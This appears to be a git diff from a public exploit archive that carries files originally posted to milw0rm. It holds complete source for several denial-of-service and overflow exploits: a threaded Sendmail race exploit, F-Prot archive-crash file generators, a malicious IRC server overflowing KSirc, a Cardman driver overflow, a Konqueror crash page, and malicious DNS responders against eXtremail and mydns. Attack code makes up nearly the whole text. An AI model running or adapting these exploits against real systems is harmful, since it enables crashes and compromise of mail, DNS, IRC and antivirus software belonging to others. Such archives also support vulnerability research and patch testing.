== 0: + rout("socket send() failed") + if(p): + rout("Sent Request: \r\n\r\n%s\r\n" % str) + +def probe(sock): + str = "HELO blacksecurity.org\r\nMAIL FROM: <%s>\r\nRCPT TO: root@%s\r\nDATA\r\n" % (fromdd,domain) + rsend(sock,str) + + +def payload(size=32764): + ret = "\x7f" * size + i = 0 + while i < size : + ret = substr(ret,": ",100 + i) + ret = substr(ret,"\r\n",200 + i) + i += 202 + + ret += "\r\n" + return ret + + +class rSendmail( threading.Thread) : + + thres = threshold + do_exit = False + btime = None + etime = None + state = 0 + total_time = 0 + + def __init__(self, thresh=0): + if not thresh == 0: + self.thres = thresh + threading.Thread.__init__ ( self ) + + + def rrecv(self,s, response=None): + buf = '' + try: + buf = s.recv(2048) + except socket.error, (ecode, reason): + #rout("Socket failure %r:%s" % (ecode, reason)) + return False + + if buf == '': + return False + + rout("Reading response: \r\n\r\n%s\r\n" % buf[0:-2]) + msg = buf[0:-2].split("\r\n") + for m in msg: + + k = m[0:3] + if (k != None) and (k != '') and (k != "\x7f\x7f\x7f"): + code = int(m[0:3]) + else: + code = 0 + + if( code == 354 and self.state == 0 ): + self.btime = time.time() + self.state += 1 + return True + elif( code == 451 and self.state == 1): + self.etime = time.time() + self.state += 1 + return True + elif( code == 451 and self.state == 4): + self.state += 1 + return True + elif( code == 354 and self.state == 3): + self.state += 1 + return True + + if (self.state == 5): + self.state += 1 + rout("Debug error, unable to escalate state") + self.stop() + return False + + if(response != None): + rsend(s,response) + + def stop(self): + self.do_exit = True + + + def run (self ): + + rout("Connecting to %s:%r" % (IP,PORT)) + + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + sock.setblocking(0) # non-blocking 0hn0 + + try: + sock.connect((IP, PORT)) + except socket.error, (ecode, reason): + if ecode in (115, 150): pass + else: + rout("Error %r:%s" % (ecode,reason)) + return + + ret = select.select([sock],[sock],[], def_timeout) + + if len(ret[1]) == 0 and len (ret[0]) == 0: + sock.close() + rout("Timed out on connect") + return + + rout("Setting non-blocking options with a default timeout of %r seconds" % def_timeout) + + xplbuf = "\xAF\xBE\xAD\xDE" + + probe1 = False + probe2 = False + pump = False + + while not self.do_exit: + + readsock, writesock, err = select.select([sock],[sock],[], def_timeout) + if len(readsock) > 0: + for s in readsock: + self.rrecv(s) + + if len(writesock) > 0: + for s in writesock: + if(self.state == 0): + if not probe1: + probe(s) # rsend(s,"HELO") + probe1 = True + break + + if(self.state == 1): + if not pump: + pump = True + time.sleep(guess_timeout - (0.9)) + rsend(s,payload(32764) + "\r\n", False) + rout("Sending heavy load") + + break + + if(self.state == 2): + # measure timeout + # wait = end - start + # where end is time of code 451 & start is 354 go ahead + self.total_time = (self.etime - self.btime) + self.thres + #self.total_time = (self.etime - self.btime) + self.state += 1 + + if(self.state == 3): + if not probe2: + rsend(s,"\n") + probe(s) + probe2 = True + break + + if(self.state == 4): + ## race here + # send bad header + # lets wait + rsend(s, xplbuf + "\r\n") + rout("Sleeping...") + time.sleep(self.total_time) + rsend(s, xplbuf + "\r\n") + + rout("Sent race-request") + self.state = 5 + break + + if(self.state == 5): + rout("State reached stage: %r" % self.state) + rout("Total wait time: %s" % self.total_time) + self.stop() + break + + self.stop() + return + + + + +mbanner() + +t_list = [] + +t = threshold + +opc = 0 + +while threading.activeCount() < threads: + opc += 1 + rout("Starting Thread: %r with time+offset: %r" % (opc, t)) + m = rSendmail(t) + m.start() + t += 0.2 + time.sleep(5) + + +sys.exit(5) # success ?? + +""" +buf = "" +atom = "\\\xff" * int(arch[def_arch]['pad']) +idx = 256 * 4 +newtag=substr(xpl[idx:],ia32(arch[def_arch]['return']), int(arch[def_arch]['offset'])) +xpl=substr(xpl, newtag, idx) +xpl=substr(xpl,atom,len(xpl)) +""" + +# milw0rm.com [2006-07-21] diff --git a/platforms/linux/dos/236.sh b/platforms/linux/dos/236.sh index 29eada268..0e00311f9 100755 --- a/platforms/linux/dos/236.sh +++ b/platforms/linux/dos/236.sh @@ -15,6 +15,6 @@ while /bin/true ; do done unset i - - -# milw0rm.com [2001-01-02] + + +# milw0rm.com [2001-01-02] diff --git a/platforms/linux/dos/238.c b/platforms/linux/dos/238.c index ffe48c92d..41f0d766d 100755 --- a/platforms/linux/dos/238.c +++ b/platforms/linux/dos/238.c @@ -37,6 +37,6 @@ int main(int argc, char **argv) } return 0; } - - -// milw0rm.com [2001-01-03] + + +// milw0rm.com [2001-01-03] diff --git a/platforms/linux/dos/251.c b/platforms/linux/dos/251.c index 005b1ecc0..cd5ca72ad 100755 --- a/platforms/linux/dos/251.c +++ b/platforms/linux/dos/251.c @@ -138,6 +138,6 @@ int main(int argc, char **argv) return 0; } - - -// milw0rm.com [2001-01-15] + + +// milw0rm.com [2001-01-15] diff --git a/platforms/linux/dos/274.c b/platforms/linux/dos/274.c index ff915bbb4..e0b9cb6f0 100755 --- a/platforms/linux/dos/274.c +++ b/platforms/linux/dos/274.c @@ -86,6 +86,6 @@ exit (1); } - - -// milw0rm.com [2004-04-21] + + +// milw0rm.com [2004-04-21] diff --git a/platforms/linux/dos/2892.py b/platforms/linux/dos/2892.py index 7fad500ef..4e2404814 100755 --- a/platforms/linux/dos/2892.py +++ b/platforms/linux/dos/2892.py @@ -1,42 +1,42 @@ -# fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS -# -# Copyright (c) 2006 Evgeny Legerov -# -# Permission to use, copy, modify, and distribute this software for any -# purpose with or without fee is hereby granted, provided that the above -# copyright notice and this permission notice appear in all copies. -# -# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES -# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF -# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR -# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES -# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN -# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF -# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. -# -# To test this code on Linux: -# -# create ACE compressed file -# $ ./fprot1.py > 1.ace -# $ f-prot 1.ace - -import sys -import struct - -ACE=""" - 58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14 - 02 00 31 12 82 33 b6 45 97 7d 00 00 00 00 16 2a - 55 4e 52 45 47 49 53 54 45 52 45 44 20 56 45 52 - 53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff - 00 00 00 00 41 42 43 44 41 42 43 44 00 00 00 00 - 02 05 41 41 41 41 0d 00 41 41 41 41 41 41 41 41 - 41 41 41 41 41 -""" - -s = "" -for i in [chr(int(i, 16)) for i in ACE.split(" ") if len(i.strip()) > 0]: - s += i - -sys.stdout.write(s) - -# milw0rm.com [2006-12-04] +# fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS +# +# Copyright (c) 2006 Evgeny Legerov +# +# Permission to use, copy, modify, and distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. +# +# To test this code on Linux: +# +# create ACE compressed file +# $ ./fprot1.py > 1.ace +# $ f-prot 1.ace + +import sys +import struct + +ACE=""" + 58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14 + 02 00 31 12 82 33 b6 45 97 7d 00 00 00 00 16 2a + 55 4e 52 45 47 49 53 54 45 52 45 44 20 56 45 52 + 53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff + 00 00 00 00 41 42 43 44 41 42 43 44 00 00 00 00 + 02 05 41 41 41 41 0d 00 41 41 41 41 41 41 41 41 + 41 41 41 41 41 +""" + +s = "" +for i in [chr(int(i, 16)) for i in ACE.split(" ") if len(i.strip()) > 0]: + s += i + +sys.stdout.write(s) + +# milw0rm.com [2006-12-04] diff --git a/platforms/linux/dos/2893.py b/platforms/linux/dos/2893.py index 5d87f5c23..7b50f73a9 100755 --- a/platforms/linux/dos/2893.py +++ b/platforms/linux/dos/2893.py @@ -1,57 +1,57 @@ -# fprot2.py - trivial proof of concept code for F-Prot 4.6.6 .CHM heap -# overflow -# -# Copyright (c) 2006 Evgeny Legerov -# -# Permission to use, copy, modify, and distribute this software for any -# purpose with or without fee is hereby granted, provided that the above -# copyright notice and this permission notice appear in all copies. -# -# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES -# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF -# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR -# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES -# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN -# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF -# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. -# -# $ ./fprot2.py > 1.chm -# $ f-prot 1.chm - -import sys -import struct - -s="" -s+="ITSF" # signature -s+=struct.pack(" 1.chm +# $ f-prot 1.chm + +import sys +import struct + +s="" +s+="ITSF" # signature +s+=struct.pack("::count () from /usr/kde/3.5/lib/libkhtml.so.4 -#2 0xb64b0550 in TestFunctionImp::~TestFunctionImp () from /usr/kde/3.5/lib/libkhtml.so.4 -#3 0xb64b43a2 in TestFunctionImp::~TestFunctionImp () from /usr/kde/3.5/lib/libkhtml.so.4 -#4 0xb63329d5 in DOM::RegisteredListenerList::getHTMLEventListener () from /usr/kde/3.5/lib/libkhtml.so.4 -#5 0xbf86ae90 in ?? () -#6 0x00000001 in ?? () -#7 0xb736f8ec in ?? () from /usr/qt/3/lib/libqt-mt.so.3 -#8 0xb71e36f9 in qt_check_pointer () from /usr/qt/3/lib/libqt-mt.so.3 -Previous frame inner to this frame (corrupt stack?) - -CRASH CODE: -=========== ---> - - - -> - - - - -# milw0rm.com [2006-12-19] + + + + +> + + + + +# milw0rm.com [2006-12-19] diff --git a/platforms/linux/dos/3023.c b/platforms/linux/dos/3023.c index cc88fd56f..e66f0ccdf 100755 --- a/platforms/linux/dos/3023.c +++ b/platforms/linux/dos/3023.c @@ -1,88 +1,88 @@ -// KSirc 1.3.12 - PRIVMSG remote Buffer Overflow // PoC -// -// Federico L. Bossi Bonin -// fbossi@globalst.com.ar -// www.GlobalST.com.ar - - -// #0 0xb7ea8792 in KSircIOController::stdout_read () from /usr/kde/3.5/lib/libkdeinit_ksirc.so -// #1 0xb7ea78c8 in KSircIOController::qt_invoke () from /usr/kde/3.5/lib/libkdeinit_ksirc.so -// #2 0xb6fedba4 in QObject::activate_signal () from /usr/qt/3/lib/libqt-mt.so.3 -// #3 0xb765410b in KProcess::receivedStdout () from /usr/kde/3.5/lib/libkdecore.so.4 -// #4 0x081a6e60 in ?? () -// #5 0x081a7238 in ?? () -// #6 0xbfcb0170 in ?? () -// #7 0x00000000 in ?? () - -#include -#include -#include -#include - -#define PORT 6667 -#define LEN 2500 - -char buffer[LEN*2]; -void sendbuff(int sock) { -char ptr[LEN*2]; -memset(buffer,0x0,sizeof(buffer)); -memset(ptr,0x0,sizeof(ptr)); -memset(ptr,0x41,LEN); -sprintf(buffer,"PRIVMSG USER:%s\n\r",ptr); -read(sock,ptr,sizeof(ptr)); -write(sock,buffer,sizeof(buffer)); -} - -int main() { -struct sockaddr_in srv_addr, client; -int len,pid,sockfd,sock; - -sockfd = socket(AF_INET, SOCK_STREAM, 0); - -if (sockfd < 0) { -perror("error socket()"); -exit(1); -} - -bzero((char *) &srv_addr, sizeof(srv_addr)); -srv_addr.sin_family = AF_INET; -srv_addr.sin_addr.s_addr = INADDR_ANY; -srv_addr.sin_port = htons(PORT); - -if (bind(sockfd, (struct sockaddr *) &srv_addr,sizeof(srv_addr)) < 0) { -perror("error bind()"); -exit(1); -} - - -printf("KSirc 1.3.12 - PRIVMSG remote PoC\n"); -printf("====================================\n"); -printf("Listening on port %i\n",PORT); - -listen(sockfd,5); -len = sizeof(client); - -while (1) { -sock = accept(sockfd, (struct sockaddr *) &client, &len); -if (sock < 0) { -perror("error accept()"); -exit(1); -} - -pid = fork(); -if (pid < 0) { -perror("fork()"); -exit(1); -} -if (pid == 0) { -close(sockfd); -printf("Conection from %s\n",inet_ntoa(client.sin_addr)); -sendbuff(sock); -exit(0); -} -else close(sock); -} -return 0; -} - -// milw0rm.com [2006-12-26] +// KSirc 1.3.12 - PRIVMSG remote Buffer Overflow // PoC +// +// Federico L. Bossi Bonin +// fbossi@globalst.com.ar +// www.GlobalST.com.ar + + +// #0 0xb7ea8792 in KSircIOController::stdout_read () from /usr/kde/3.5/lib/libkdeinit_ksirc.so +// #1 0xb7ea78c8 in KSircIOController::qt_invoke () from /usr/kde/3.5/lib/libkdeinit_ksirc.so +// #2 0xb6fedba4 in QObject::activate_signal () from /usr/qt/3/lib/libqt-mt.so.3 +// #3 0xb765410b in KProcess::receivedStdout () from /usr/kde/3.5/lib/libkdecore.so.4 +// #4 0x081a6e60 in ?? () +// #5 0x081a7238 in ?? () +// #6 0xbfcb0170 in ?? () +// #7 0x00000000 in ?? () + +#include +#include +#include +#include + +#define PORT 6667 +#define LEN 2500 + +char buffer[LEN*2]; +void sendbuff(int sock) { +char ptr[LEN*2]; +memset(buffer,0x0,sizeof(buffer)); +memset(ptr,0x0,sizeof(ptr)); +memset(ptr,0x41,LEN); +sprintf(buffer,"PRIVMSG USER:%s\n\r",ptr); +read(sock,ptr,sizeof(ptr)); +write(sock,buffer,sizeof(buffer)); +} + +int main() { +struct sockaddr_in srv_addr, client; +int len,pid,sockfd,sock; + +sockfd = socket(AF_INET, SOCK_STREAM, 0); + +if (sockfd < 0) { +perror("error socket()"); +exit(1); +} + +bzero((char *) &srv_addr, sizeof(srv_addr)); +srv_addr.sin_family = AF_INET; +srv_addr.sin_addr.s_addr = INADDR_ANY; +srv_addr.sin_port = htons(PORT); + +if (bind(sockfd, (struct sockaddr *) &srv_addr,sizeof(srv_addr)) < 0) { +perror("error bind()"); +exit(1); +} + + +printf("KSirc 1.3.12 - PRIVMSG remote PoC\n"); +printf("====================================\n"); +printf("Listening on port %i\n",PORT); + +listen(sockfd,5); +len = sizeof(client); + +while (1) { +sock = accept(sockfd, (struct sockaddr *) &client, &len); +if (sock < 0) { +perror("error accept()"); +exit(1); +} + +pid = fork(); +if (pid < 0) { +perror("fork()"); +exit(1); +} +if (pid == 0) { +close(sockfd); +printf("Conection from %s\n",inet_ntoa(client.sin_addr)); +sendbuff(sock); +exit(0); +} +else close(sock); +} +return 0; +} + +// milw0rm.com [2006-12-26] diff --git a/platforms/linux/dos/306.c b/platforms/linux/dos/306.c index b84fdc5a2..73cdef543 100755 --- a/platforms/linux/dos/306.c +++ b/platforms/linux/dos/306.c @@ -68,6 +68,6 @@ int main(int argc, char *argv[]) return 0; } // < - -# milw0rm.com [2007-03-02] + + +# milw0rm.com [2007-03-02] diff --git a/platforms/linux/dos/3415.html b/platforms/linux/dos/3415.html index e8800daf5..a5064dbda 100755 --- a/platforms/linux/dos/3415.html +++ b/platforms/linux/dos/3415.html @@ -1,28 +1,28 @@ - - - -Demo of how to make Konqueror 3.5.5 crash by mark@bindshell.net.

-Simply load this file in Konqueror. Vulnerable versions should segfault instantly with a null pointer exception.

-

- - - - - -# milw0rm.com [2007-03-05] + + + +Demo of how to make Konqueror 3.5.5 crash by mark@bindshell.net.

+Simply load this file in Konqueror. Vulnerable versions should segfault instantly with a null pointer exception.

+

+ + + + + +# milw0rm.com [2007-03-05] diff --git a/platforms/linux/dos/3441.c b/platforms/linux/dos/3441.c index 8fb9b5aea..76ce72a56 100755 --- a/platforms/linux/dos/3441.c +++ b/platforms/linux/dos/3441.c @@ -1,42 +1,42 @@ -/* - * Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005) - * Copyright (C) Daniel Roethlisberger - * Compass Security Network Computing AG, Rapperswil, Switzerland. - * All rights reserved. - * http://www.csnc.ch/ - */ - -#include -#include -#include -#include -#include -#include -#include - -int main(int argc, char *argv[]) { - int fd, i, n; - char buf[8192]; - - /* - * 0 1 2 3 4 5 6 7 8 9 a b c d e f ... - * 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ... - */ - for (i = 0; i < sizeof(buf); i += 2) { - buf[i] = (char)(((i/2) & 0xFF00) >> 8); - buf[i+1] = (char) ((i/2) & 0x00FF); - } - - if ((fd = open("/dev/cmx0", O_RDWR)) < 0) { - printf("Error: open() => %s\n", strerror(errno)); - exit(errno); - } - if ((n = write(fd, buf, sizeof(buf))) < 0) { - printf("Error: write() => %s\n", strerror(errno)); - exit(errno); - } - printf("%d of %d bytes written\n", n, sizeof(buf)); - exit(0); -} - -// milw0rm.com [2007-03-09] +/* + * Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005) + * Copyright (C) Daniel Roethlisberger + * Compass Security Network Computing AG, Rapperswil, Switzerland. + * All rights reserved. + * http://www.csnc.ch/ + */ + +#include +#include +#include +#include +#include +#include +#include + +int main(int argc, char *argv[]) { + int fd, i, n; + char buf[8192]; + + /* + * 0 1 2 3 4 5 6 7 8 9 a b c d e f ... + * 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ... + */ + for (i = 0; i < sizeof(buf); i += 2) { + buf[i] = (char)(((i/2) & 0xFF00) >> 8); + buf[i+1] = (char) ((i/2) & 0x00FF); + } + + if ((fd = open("/dev/cmx0", O_RDWR)) < 0) { + printf("Error: open() => %s\n", strerror(errno)); + exit(errno); + } + if ((n = write(fd, buf, sizeof(buf))) < 0) { + printf("Error: write() => %s\n", strerror(errno)); + exit(errno); + } + printf("%d of %d bytes written\n", n, sizeof(buf)); + exit(0); +} + +// milw0rm.com [2007-03-09] diff --git a/platforms/linux/dos/3586.php b/platforms/linux/dos/3586.php index 93cbadfb0..a2488ea93 100755 --- a/platforms/linux/dos/3586.php +++ b/platforms/linux/dos/3586.php @@ -1,42 +1,42 @@ - - -# milw0rm.com [2007-03-27] + + +# milw0rm.com [2007-03-27] diff --git a/platforms/linux/dos/370.c b/platforms/linux/dos/370.c index bce2ebb0d..a77fcd0ea 100755 --- a/platforms/linux/dos/370.c +++ b/platforms/linux/dos/370.c @@ -148,6 +148,6 @@ by CoKi [+] conecting... OK [+] sending exploit... OK -coki@servidor:~$ - -// milw0rm.com [2004-08-02] +coki@servidor:~$ + +// milw0rm.com [2004-08-02] diff --git a/platforms/linux/dos/3769.c b/platforms/linux/dos/3769.c index ad88f3bea..d0ced4ee6 100755 --- a/platforms/linux/dos/3769.c +++ b/platforms/linux/dos/3769.c @@ -1,140 +1,140 @@ -/* extremail-v9.c - * - * Copyright (c) 2007 by - * - * eXtremail <2.1.1 remote root POC (x86-lnx) - * by mu-b - Tue Feb 6 2007 - * - * - Tested on: eXtremail 2.1.0 (lnx) - * eXtremail 2.1.1 (lnx) - * - * POC for DNS parsing bugs... - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation; version 2 of the License. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! - */ - -#include -#include -#include -#include -#include -#include - -#define DNS_HDR_LEN 12 -#define DNS_TRAIL_LEN 20 - -#define DNS_PORT 53 -#define DNS_MAX_MSG 0x200 - -#define HAMMER_LEN 284 - -static char * dns_hdr_buf = - "\x69\x69" /* transaction id */ - "\x81\x80" /* flags */ - "\x00\x01" /* questions */ - "\x00\x01" /* answers rrs */ - "\x00\x00" /* authority rrs */ - "\x00\x00"; /* additional rrs */ - -static char * dns_trail_buf = - "\x00\x01" /* type */ - "\x00\x01" /* class */ - /* Answers */ - "\xc0\x0c" /* name ptr */ - "\x00\x01" /* type */ - "\x00\x01" /* class */ - "\x00\x01\x51\x80" /* ttl (1 day) */ - "\x00\x04" /* data length */ - "\xff\xff\xff\xff"; /* 255.255.255.255 */ - -int -main (int argc, char *argv[]) -{ - int sock, result; - struct sockaddr_in cliaddr, servaddr; - - printf ("eXtremail 2.1.1 remote root POC\n" - "by: \n" - "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); - - sock = socket (AF_INET, SOCK_DGRAM, 0); - if (sock < 0) - { - perror ("socket()"); - exit (EXIT_FAILURE); - } - - servaddr.sin_family = AF_INET; - servaddr.sin_addr.s_addr = htonl (INADDR_ANY); - servaddr.sin_port = htons (DNS_PORT); - result = bind (sock, (struct sockaddr *) &servaddr, sizeof servaddr); - if (result < 0) - { - perror ("bind()"); - exit (EXIT_FAILURE); - } - - printf ("+Waiting for data on port %d...\n", DNS_PORT); - - while (1) - { - int n, clilen, curlen, len; - char rbuf[DNS_MAX_MSG], sbuf[DNS_MAX_MSG*4]; - char *ptr; - - memset (rbuf, 0, sizeof rbuf); - memset (sbuf, 0, sizeof sbuf); - - /* receive message */ - clilen = sizeof cliaddr; - n = recvfrom (sock, rbuf, DNS_MAX_MSG, 0, (struct sockaddr *) &cliaddr, &clilen); - - if (n < 0) - { - printf ("- cannot receive data!\n"); - continue; - } - - /* print received message */ - printf ("+ Connection from %s: %u\n", - inet_ntoa (cliaddr.sin_addr), - ntohs (cliaddr.sin_port)); - - /* formulate reply */ - ptr = sbuf; - memcpy (ptr, dns_hdr_buf, DNS_HDR_LEN); - ptr += DNS_HDR_LEN; - - for (len = 0; len < HAMMER_LEN; ptr += curlen) - { - if (len + 63 > HAMMER_LEN) - curlen = HAMMER_LEN - len; - else - curlen = 63; - - len += curlen; - *ptr++ = curlen; - memset (ptr, 0x41, curlen); - } - - *((unsigned long *)(ptr - 4)) = 0xdeadbeef; - *ptr++ = 0x00; - memcpy (ptr, dns_trail_buf, DNS_TRAIL_LEN); - ptr += DNS_TRAIL_LEN; - - n = sendto (sock, sbuf, ptr-sbuf, 0, (struct sockaddr *) &cliaddr, clilen); - } - - return (EXIT_SUCCESS); -} - -// milw0rm.com [2007-04-20] +/* extremail-v9.c + * + * Copyright (c) 2007 by + * + * eXtremail <2.1.1 remote root POC (x86-lnx) + * by mu-b - Tue Feb 6 2007 + * + * - Tested on: eXtremail 2.1.0 (lnx) + * eXtremail 2.1.1 (lnx) + * + * POC for DNS parsing bugs... + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; version 2 of the License. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! + */ + +#include +#include +#include +#include +#include +#include + +#define DNS_HDR_LEN 12 +#define DNS_TRAIL_LEN 20 + +#define DNS_PORT 53 +#define DNS_MAX_MSG 0x200 + +#define HAMMER_LEN 284 + +static char * dns_hdr_buf = + "\x69\x69" /* transaction id */ + "\x81\x80" /* flags */ + "\x00\x01" /* questions */ + "\x00\x01" /* answers rrs */ + "\x00\x00" /* authority rrs */ + "\x00\x00"; /* additional rrs */ + +static char * dns_trail_buf = + "\x00\x01" /* type */ + "\x00\x01" /* class */ + /* Answers */ + "\xc0\x0c" /* name ptr */ + "\x00\x01" /* type */ + "\x00\x01" /* class */ + "\x00\x01\x51\x80" /* ttl (1 day) */ + "\x00\x04" /* data length */ + "\xff\xff\xff\xff"; /* 255.255.255.255 */ + +int +main (int argc, char *argv[]) +{ + int sock, result; + struct sockaddr_in cliaddr, servaddr; + + printf ("eXtremail 2.1.1 remote root POC\n" + "by: \n" + "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n"); + + sock = socket (AF_INET, SOCK_DGRAM, 0); + if (sock < 0) + { + perror ("socket()"); + exit (EXIT_FAILURE); + } + + servaddr.sin_family = AF_INET; + servaddr.sin_addr.s_addr = htonl (INADDR_ANY); + servaddr.sin_port = htons (DNS_PORT); + result = bind (sock, (struct sockaddr *) &servaddr, sizeof servaddr); + if (result < 0) + { + perror ("bind()"); + exit (EXIT_FAILURE); + } + + printf ("+Waiting for data on port %d...\n", DNS_PORT); + + while (1) + { + int n, clilen, curlen, len; + char rbuf[DNS_MAX_MSG], sbuf[DNS_MAX_MSG*4]; + char *ptr; + + memset (rbuf, 0, sizeof rbuf); + memset (sbuf, 0, sizeof sbuf); + + /* receive message */ + clilen = sizeof cliaddr; + n = recvfrom (sock, rbuf, DNS_MAX_MSG, 0, (struct sockaddr *) &cliaddr, &clilen); + + if (n < 0) + { + printf ("- cannot receive data!\n"); + continue; + } + + /* print received message */ + printf ("+ Connection from %s: %u\n", + inet_ntoa (cliaddr.sin_addr), + ntohs (cliaddr.sin_port)); + + /* formulate reply */ + ptr = sbuf; + memcpy (ptr, dns_hdr_buf, DNS_HDR_LEN); + ptr += DNS_HDR_LEN; + + for (len = 0; len < HAMMER_LEN; ptr += curlen) + { + if (len + 63 > HAMMER_LEN) + curlen = HAMMER_LEN - len; + else + curlen = 63; + + len += curlen; + *ptr++ = curlen; + memset (ptr, 0x41, curlen); + } + + *((unsigned long *)(ptr - 4)) = 0xdeadbeef; + *ptr++ = 0x00; + memcpy (ptr, dns_trail_buf, DNS_TRAIL_LEN); + ptr += DNS_TRAIL_LEN; + + n = sendto (sock, sbuf, ptr-sbuf, 0, (struct sockaddr *) &cliaddr, clilen); + } + + return (EXIT_SUCCESS); +} + +// milw0rm.com [2007-04-20] diff --git a/platforms/linux/dos/3807.c b/platforms/linux/dos/3807.c index 903e0fde5..a64405fc3 100755 --- a/platforms/linux/dos/3807.c +++ b/platforms/linux/dos/3807.c @@ -1,154 +1,154 @@ -/* mydns-rr-smash.c - * - * Copyright (c) 2007 by - * - * mydns remote exploit PoC (x86-lnx) - * by mu-b - Apr 2007 - * - * - Tested on: mydns-1.1.0 (.tar.gz) - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License as published by - * the Free Software Foundation; version 2 of the License. - * - * This program is distributed in the hope that it will be useful, - * but WITHOUT ANY WARRANTY; without even the implied warranty of - * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - * GNU General Public License for more details. - * - * http://www.digit-labs.org/ -- Digit-Labs 2007!@$! - */ - -#include -#include -#include -#include -#include -#include - -#define BUF_SIZE 512 -#define NOP 0x41 - -#define DEF_PORT 53 -#define PORT_DNS DEF_PORT - -static void sock_send_udp (u_char * host, int port, u_char * src, int len); -static void zbuffami (u_char * zbuf, u_char *domain); - -static void -sock_send_udp (u_char * host, int port, u_char * src, int len) -{ - struct sockaddr_in address; - struct hostent *hp; - int sock; - - fflush (stdout); - if ((sock = socket (AF_INET, SOCK_DGRAM, 0)) == -1) - { - perror ("socket()"); - exit (-1); - } - - if ((hp = gethostbyname (host)) == NULL) - { - perror ("gethostbyname()"); - exit (-1); - } - - memset (&address, 0, sizeof (address)); - memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length); - address.sin_family = AF_INET; - address.sin_port = htons (port); - - sendto (sock, src, len, 0, (struct sockaddr *) &address, sizeof (address)); -} - -static void -zbuffami (u_char * zbuf, u_char *domain) -{ - u_char *ptr, *bgn, *end; - - ptr = zbuf; - *ptr++ = 0x69; /* transaction id */ - *ptr++ = 0x69; - *ptr++ = 0x28; /* flags */ - *ptr++ = 0x80; - *ptr++ = 0x00; /* number of questions */ - *ptr++ = 0x01; - *ptr++ = 0x00; /* number of answers */ - *ptr++ = 0x01; - *ptr++ = 0x00; /* number of authority rr's */ - *ptr++ = 0x01; - *ptr++ = 0x00; /* number of additional rr's */ - *ptr++ = 0x00; - - /* question */ - bgn = strtok (domain, "."); - while (bgn != NULL) - { - unsigned int len; - - len = strlen (bgn); - *ptr++ = len; - memcpy (ptr, bgn, len); - ptr += len; - - bgn = strtok (NULL, "."); - } - *ptr++ = 0x00; /* terminate name */ - - *ptr++ = 0x00; /* type */ - *ptr++ = 0x06; - *ptr++ = 0xff; /* class */ - *ptr++ = 0xff; - - /* update */ - *ptr++ = 0x00; /* . */ - *ptr++ = 0x00; /* rr->type */ - *ptr++ = 0x00; - *ptr++ = 0x00; /* rr->class */ - *ptr++ = 0x01; - *ptr++ = 0xff; /* rr->ttl */ - *ptr++ = 0xff; - *ptr++ = 0xff; - *ptr++ = 0xff; - *ptr++ = 0xff; /* rr->rdlength */ - *ptr++ = 0xff; - - /* rrdata */ - printf ("NOP: %d\n", BUF_SIZE - (ptr - zbuf)); - memset (ptr, NOP, BUF_SIZE - (ptr - zbuf)); -} - -int -main (int argc, char **argv) -{ - int sock; - u_char zbuf[BUF_SIZE]; - - printf ("mydns <= 